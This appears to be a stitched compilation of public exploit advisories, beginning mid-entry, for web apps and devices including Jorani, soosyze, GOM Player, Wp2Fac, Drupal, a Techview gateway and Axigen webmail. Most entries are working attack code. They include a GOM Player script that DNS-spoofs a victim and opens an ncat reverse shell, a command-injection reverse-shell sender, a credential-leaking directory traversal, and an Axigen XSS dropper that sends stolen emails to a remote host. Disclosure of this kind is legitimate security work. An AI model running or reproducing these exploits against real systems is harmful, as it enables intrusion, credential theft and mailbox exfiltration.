[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Bus-Reservation-System-1.1-Multiple-SQLi)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/bus-reservation-system-11-multiple-sqli.html)
## Time spend:
00:25:00
# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection
# Date: 28.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://elementor.com/
# Version: < 3.5.5
# Tested on: Google and Firefox latest version
# CVE : CVE-2022-4953
# 1. Description
The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.
# 2. Proof of Concept (PoC)
Proof of Concept:
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
## Title: Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure
## Author: nu11secur1ty
## Date: 08/27/2023
## Vendor: https://jorani.org/
## Software: https://demo.jorani.org/session/login
## Reference: https://portswigger.net/web-security/cross-site-scripting
## Reference: https://portswigger.net/web-security/information-disclosure
## Description:
The value of the `language request` parameter is copied into a
JavaScript string which is encapsulated in double quotation marks. The
payload 75943";alert(1)//569 was submitted in the language parameter.
This input was echoed unmodified in the application's response.
The attacker can modify the token session and he can discover
sensitive information for the server.
STATUS: HIGH-Vulnerability
[+]Exploit:
```POST
POST /session/login HTTP/1.1
Host: demo.jorani.org
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;
jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK
Origin: http://demo.jorani.org
Upgrade-Insecure-Requests: 1
Referer: http://demo.jorani.org/session/login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 183
csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=
```
[+]Response:
```HTTP
HTTP/1.1 200 OK
date: Sun, 27 Aug 2023 06:03:04 GMT
content-type: text/html; charset=UTF-8
Content-Length: 681
server: Apache
x-powered-by: PHP/8.2
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;
expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;
SameSite=Strict
set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;
expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;
SameSite=Lax
last-modified: Sun, 27 Aug 2023 06:03:04 GMT
vary: Accept-Encoding
cache-control: private, no-cache, no-store, proxy-revalidate,
no-transform, must-revalidate
pragma: no-cache
x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1
x-iplb-instance: 27474
connection: close
<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
<h4>A PHP Error was encountered</h4>
<p>Severity: 8192</p>
<p>Message: strlen(): Passing null to parameter #1 ($string) of type
string is deprecated</p>
<p>Filename: controllers/Connection.php</p>
<p>Line Number: 126</p>
</div>
<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
<h4>A PHP Error was encountered</h4>
<p>Severity: Warning</p>
<p>Message: Cannot modify header information - headers already sent
by (output started at
/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p>
<p>Filename: helpers/url_helper.php</p>
<p>Line Number: 565</p>
</div>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)
## Time spend:
01:35:00
## Title: soosyze 2.0.0 - File Upload
## Author: nu11secur1ty
## Date: 04.26.2023-08.28.2023
## Vendor: https://soosyze.com/
## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
## Reference: https://portswigger.net/web-security/file-upload
## Description:
Broken file upload logic. The malicious user can upload whatever he
wants to an HTML file and when he tries to execute it he views almost
all
file paths. This could be worse than ever, it depends on the scenario.
STATUS: HIGH Vulnerability
[+]Exploit:
```HTML
<!DOCTYPE html>
<html>
<head>
<title>Hello broken file upload logic, now I can read your special
directory pats, thank you ;)</title>
</head>
<body>
<h1>
<?php
phpinfo();
?>
</h1>
</body>
</html>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)
## Time spend:
01:27:00
# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
# Date: 26.08.2023
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Version: 2.3.90.5360
# Tested on: Windows 10 Pro x64 22H2 19045.3324
# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8
# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.
# Vulnerability Description:
# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the
# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window.
# Full disclosure, developers should be more careful about software security.
# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.
# Some spaghetti and a bad code but it works :)
banner = """\033[38;5;196m+-----------------------------------------------------------+
| GOM Player 2.3.90.5360 - Remote Code Execution |
| Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-) |
+-----------------------------------------------------------+\033[0m""" +"""
\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""
import time,os,zipfile,subprocess,socket,sys
print(banner)
if os.geteuid() != 0:
print("You need root privileges to run the exploit, please use sudo...")
sys.exit(1)
targetIP = input("- Target IP address: ")
listenPort = input("- Listening port for Reverse Shell: ")
def fCreate(fileName,fileContent): # File create func.
f = open(fileName,"w")
f.write(fileContent)
f.close()
gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
gateway = gw[2]
host = socket.gethostname()
print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host)
print("\n[*]- Stage 1: Downloading neccesary tools...")
smbFolderName = "GomUpdater" # change this (optional)
expWorkDir = "gomExploitDir" # change this (optional)
os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability.
os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability.
os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
print(" [*] - Ncat has been downloaded.")
subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
print(" [*] - Impacket has been downloaded.")
subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
print(" [*] - DNSSpoof.py has been downloaded.")
print("[*]- Stage 2: Creating Attacker SMB Server...")
subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
time.sleep(5) # It's necessary for exploit stability.
smbIP = ipaddr
spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP
print("[*]- Stage 3: Creating Attacker Web Page...")
# change this (optional)
screenExpPage = """
<meta charset="utf-8">
<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script>
<script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
</script>
"""
fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
time.sleep(3) # It's necessary for exploit stability.
print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
vbsCommand = '''Set shell=CreateObject("wscript.shell")
Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
WScript.Sleep 5000
Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
fCreate(expWorkDir + "/payload.vbs",vbsCommand)
urlShortcut = '''[InternetShortcut]
URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
IDlist='''
fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
time.sleep(3) # It's necessary for exploit stability.
zipName = expWorkDir + "/smb-shared/archive.zip"
payload_filename = os.path.join(expWorkDir, "payload.vbs")
with zipfile.ZipFile(zipName, "w") as malzip:
malzip.write(payload_filename, arcname=os.path.basename(payload_filename))
print("[*]- Stage 5: Running the attacker's web server...")
subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
time.sleep(3) # It's necessary for exploit stability.
print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
time.sleep(10) # It's neccesary for exploit stability.
os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target...
os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
subprocess.run("nc -lvnp " + listenPort,shell=True)
subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...
# Exploit Title: Wp2Fac v1.0 - OS Command Injection
# Date: 2023-08-27
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://github.com/metinyesil/wp2fac
# Tested on: Kali Linux & Windows 11
# CVE: N/A
import requests
def send_post_request(host, revshell):
url = f'http://{host}/send.php'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)
Gecko/20100101 Firefox/102.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': f'http://{host}',
'Connection': 'close',
'Referer': f'http://{host}/',
}
data = {
'numara': f'1234567890 & {revshell} &;'
}
response = requests.post(url, headers=headers, data=data)
return response.text
host = input("Target IP: ")
revshell = input("Reverse Shell Command: ")
print("Check your listener!")
send_post_request(host, revshell)
## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction
## Author: nu11secur1ty
## Date: 08/30/2023
## Vendor: https://www.drupal.org/
## Software: https://www.drupal.org/download
## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http
## Description:
It is possible to induce the application to perform server-side HTTP
requests to arbitrary domains.
The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com was
submitted in the HTTP Host header.
The application performed an HTTP request to the specified domain. For
the second test, the attacker stored a response
on the server with malicious content. This can be bad for a lot of
users of this system if the attacker spreads a malicious URL
and sends it by email etc. By using a redirect exploit.
STATUS: HIGH-Vulnerability
[+]Exploit:
```GET
GET /drupal/web/?psp4hw87ev=1 HTTP/1.1
Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com
Accept-Encoding: gzip, deflate, psp4hw87ev
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,
text/psp4hw87ev
Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111
Safari/537.36 psp4hw87ev
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Origin: https://psp4hw87ev.pwnedhost.com
```
[+]Response from Burpcollaborator server:
```HTTP
HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 62
<html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html>
```
[+]Response from Attacker server
```HTTP
192.168.100.45 - - [30/Aug/2023 05:52:56] "GET
/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)
## Time spend:
03:35:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
# Google Dork: N/A
# Date: 25/08/2023
# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]
# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
# Software Link: N/A
# Version: 1.0.19_T53
# Tested on: MACOS/Linux
# CVE : CVE-2023-34723
# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725
#!/opt/homebrew/bin/python3
import requests
import sys
from time import sleep
from urllib3.exceptions import InsecureRequestWarning
from colorama import init
from colorama import Fore, Back, Style
import re
import os
import ipaddress
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def banner():
if os.name == 'posix':
clr_cmd = ('clear')
elif os.name == 'nt':
clr_cmd = ('cls')
os.system(clr_cmd)
print ("[+]****************************************************[+]")
print (" | Author : The Security Team |")
print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
print (" | Description : TechVIEW LA-5570 Directory Traversal |")
print (" | Usage : "+sys.argv[0]+" <target> |")
print ("[+]****************************************************[+]")
def usage():
print (f"Usage: {sys.argv[0]} <target>")
def main(target):
domain = "http://"+target+"/config/system.conf"
try:
url = domain.strip()
r = requests.get(url, verify=False, timeout=3)
print ("[+] Retrieving credentials", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
if ("system_password" in r.text):
data = (r.text.split("\n"))
print (f"\n{data[1]}")
else:
print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
except TimeoutError:
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
except KeyboardInterrupt:
return
except requests.exceptions.Timeout:
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
return
if __name__ == '__main__':
if len(sys.argv)>1:
banner()
target = sys.argv[1]
try:
validate = ipaddress.ip_address(target)
if (validate):
main (target)
except ValueError as e:
print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)
else:
print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)
# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
# Google Dork: inurl:passwordexpired=yes
# Date: 2023-08-21
# Exploit Author: AmirZargham
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.0–4370c946) and older version of Axigen WebMail
# Tested on: firefox,chrome
# CVE: CVE-2022-31470
Exploit
We use the second Reflected XSS to exploit this vulnerability, create a
malicious link, and steal user emails.
Dropper code
This dropper code, loads and executes JavaScript exploit code from a remote
server.
');
x = document.createElement('script');
x.src = 'https://example.com/exploit.js';
window.addEventListener('DOMContentLoaded',function y(){
document.body.appendChild(x)
})//
Encoded form
/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27
https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//
Exploit code
xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');
xhr1.open('GET', '/', true);
xhr1.onreadystatechange = () => {
if (xhr1.readyState === XMLHttpRequest.DONE) {
_h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
xhr2.setRequestHeader('Content-Type', 'application/json');
xhr2.onreadystatechange = () => {
if (xhr2.readyState === XMLHttpRequest.DONE) {
if (xhr2.status === 401){
script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
document.body.appendChild(script_tag);
} else {
resp = xhr2.responseText;
folderId = JSON.parse(resp)["mails"][0]["folderId"];
xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
xhr3.onreadystatechange = () => {
if (xhr3.readyState === XMLHttpRequest.DONE) {
emails = xhr3.responseText;
script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
document.body.appendChild(script_tag);
}
};
xhr3.send();
}
}
};
var body = JSON.stringify({isUnread: false});
xhr2.send(body);
}
};
xhr1.send();
Combining dropper and exploit
You can host the exploit code somewhere and then address it in the dropper
code.